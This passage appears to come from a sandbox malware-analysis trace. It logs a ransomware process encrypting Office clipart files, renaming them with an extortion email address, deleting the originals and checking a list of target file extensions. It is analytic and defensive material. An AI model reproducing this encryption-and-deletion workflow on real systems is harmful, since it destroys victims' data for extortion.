lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.580] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.580] SetEndOfFile (hFile=0x344) returned 1 [0063.580] CloseHandle (hObject=0x344) returned 1 [0063.581] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.581] SetEndOfFile (hFile=0x2c8) returned 1 [0063.581] CloseHandle (hObject=0x2c8) returned 1 [0063.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0063.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.582] lstrlenW (lpString=".doc") returned 4 [0063.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.582] lstrlenW (lpString=".docx") returned 5 [0063.582] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.582] lstrlenW (lpString=".pdf") returned 4 [0063.583] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString=".xls") returned 4 [0063.583] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.583] lstrlenW (lpString=".xlsx") returned 5 [0063.583] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.583] lstrlenW (lpString=".ppt") returned 4 [0063.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.583] lstrlenW (lpString=".zip") returned 4 [0063.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.583] lstrlenW (lpString=".rar") returned 4 [0063.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString=".bz2") returned 4 [0063.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString=".7z") returned 3 [0063.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.583] lstrlenW (lpString=".dbf") returned 4 [0063.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.583] lstrlenW (lpString=".1cd") returned 4 [0063.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0063.583] lstrlenW (lpString=".jpg") returned 4 [0063.583] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.584] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.584] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.584] GetLastError () returned 0x0 [0063.584] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xf92, lpOverlapped=0x0) returned 1 [0063.591] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xfa0, lpOverlapped=0x0) returned 1 [0063.592] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.592] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.593] SetEndOfFile (hFile=0x344) returned 1 [0063.593] CloseHandle (hObject=0x344) returned 1 [0063.594] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.594] SetEndOfFile (hFile=0x2c8) returned 1 [0063.595] CloseHandle (hObject=0x2c8) returned 1 [0063.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0063.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.597] lstrlenW (lpString=".doc") returned 4 [0063.597] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.597] lstrlenW (lpString=".docx") returned 5 [0063.597] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.597] lstrlenW (lpString=".pdf") returned 4 [0063.597] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.597] lstrlenW (lpString=".xls") returned 4 [0063.597] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.598] lstrlenW (lpString=".xlsx") returned 5 [0063.598] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.598] lstrlenW (lpString=".ppt") returned 4 [0063.598] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.598] lstrlenW (lpString=".zip") returned 4 [0063.598] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.598] lstrlenW (lpString=".rar") returned 4 [0063.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.598] lstrlenW (lpString=".bz2") returned 4 [0063.598] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.598] lstrlenW (lpString=".7z") returned 3 [0063.598] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.598] lstrlenW (lpString=".dbf") returned 4 [0063.598] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.598] lstrlenW (lpString=".1cd") returned 4 [0063.598] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0063.598] lstrlenW (lpString=".jpg") returned 4 [0063.598] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.602] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.602] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0063.603] GetLastError () returned 0x0 [0063.603] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2458, lpOverlapped=0x0) returned 1 [0063.608] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2460, lpOverlapped=0x0) returned 1 [0063.610] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.610] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.610] SetEndOfFile (hFile=0x368) returned 1 [0063.611] CloseHandle (hObject=0x368) returned 1 [0063.611] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.611] SetEndOfFile (hFile=0x344) returned 1 [0063.612] CloseHandle (hObject=0x344) returned 1 [0063.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 [0063.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.613] lstrlenW (lpString=".doc") returned 4 [0063.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.613] lstrlenW (lpString=".docx") returned 5 [0063.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.613] lstrlenW (lpString=".pdf") returned 4 [0063.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.613] lstrlenW (lpString=".xls") returned 4 [0063.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.613] lstrlenW (lpString=".xlsx") returned 5 [0063.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.613] lstrlenW (lpString=".ppt") returned 4 [0063.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.613] lstrlenW (lpString=".zip") returned 4 [0063.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.613] lstrlenW (lpString=".rar") returned 4 [0063.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.613] lstrlenW (lpString=".bz2") returned 4 [0063.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.613] lstrlenW (lpString=".7z") returned 3 [0063.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.614] lstrlenW (lpString=".dbf") returned 4 [0063.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.614] lstrlenW (lpString=".1cd") returned 4 [0063.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0063.614] lstrlenW (lpString=".jpg") returned 4 [0063.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.884] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.884] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.885] GetLastError () returned 0x0 [0063.885] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x386c, lpOverlapped=0x0) returned 1 [0063.933] WriteFile (in: hFile=0x388, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3870, lpOverlapped=0x0) returned 1 [0063.934] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.934] WriteFile (in: hFile=0x388, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.935] SetEndOfFile (hFile=0x388) returned 1 [0063.935] CloseHandle (hObject=0x388) returned 1 [0063.936] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.936] SetEndOfFile (hFile=0x340) returned 1 [0063.937] CloseHandle (hObject=0x340) returned 1 [0063.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0063.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.938] lstrlenW (lpString=".doc") returned 4 [0063.938] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.938] lstrlenW (lpString=".docx") returned 5 [0063.938] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.938] lstrlenW (lpString=".pdf") returned 4 [0063.938] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.938] lstrlenW (lpString=".xls") returned 4 [0063.938] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.938] lstrlenW (lpString=".xlsx") returned 5 [0063.938] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.938] lstrlenW (lpString=".ppt") returned 4 [0063.938] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.938] lstrlenW (lpString=".zip") returned 4 [0063.938] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.938] lstrlenW (lpString=".rar") returned 4 [0063.938] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.938] lstrlenW (lpString=".bz2") returned 4 [0063.938] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.938] lstrlenW (lpString=".7z") returned 3 [0063.938] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.938] lstrlenW (lpString=".dbf") returned 4 [0063.939] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.939] lstrlenW (lpString=".1cd") returned 4 [0063.939] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 68 [0063.939] lstrlenW (lpString=".jpg") returned 4 [0063.939] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.939] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.939] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.939] GetLastError () returned 0x0 [0063.939] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4c14, lpOverlapped=0x0) returned 1 [0063.954] WriteFile (in: hFile=0x388, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4c20, lpOverlapped=0x0) returned 1 [0063.955] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.955] WriteFile (in: hFile=0x388, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.955] SetEndOfFile (hFile=0x388) returned 1 [0063.956] CloseHandle (hObject=0x388) returned 1 [0063.957] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.957] SetEndOfFile (hFile=0x340) returned 1 [0063.957] CloseHandle (hObject=0x340) returned 1 [0063.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString=".doc") returned 4 [0063.960] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString=".docx") returned 5 [0063.960] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.960] lstrlenW (lpString=".pdf") returned 4 [0063.960] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString=".xls") returned 4 [0063.960] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.960] lstrlenW (lpString=".xlsx") returned 5 [0063.960] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.960] lstrlenW (lpString=".ppt") returned 4 [0063.960] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString=".zip") returned 4 [0063.960] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.960] lstrlenW (lpString=".rar") returned 4 [0063.960] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString=".bz2") returned 4 [0063.960] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString=".7z") returned 3 [0063.960] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString=".dbf") returned 4 [0063.960] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString=".1cd") returned 4 [0063.960] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0063.960] lstrlenW (lpString=".jpg") returned 4 [0063.960] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.961] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.961] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.966] GetLastError () returned 0x0 [0063.966] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x714c, lpOverlapped=0x0) returned 1 [0064.014] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7150, lpOverlapped=0x0) returned 1 [0064.016] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.016] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.016] SetEndOfFile (hFile=0x354) returned 1 [0064.025] CloseHandle (hObject=0x354) returned 1 [0064.027] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.027] SetEndOfFile (hFile=0x388) returned 1 [0064.031] CloseHandle (hObject=0x388) returned 1 [0064.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0064.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.032] lstrlenW (lpString=".doc") returned 4 [0064.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.032] lstrlenW (lpString=".docx") returned 5 [0064.032] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0064.032] lstrlenW (lpString=".pdf") returned 4 [0064.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.032] lstrlenW (lpString=".xls") returned 4 [0064.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.032] lstrlenW 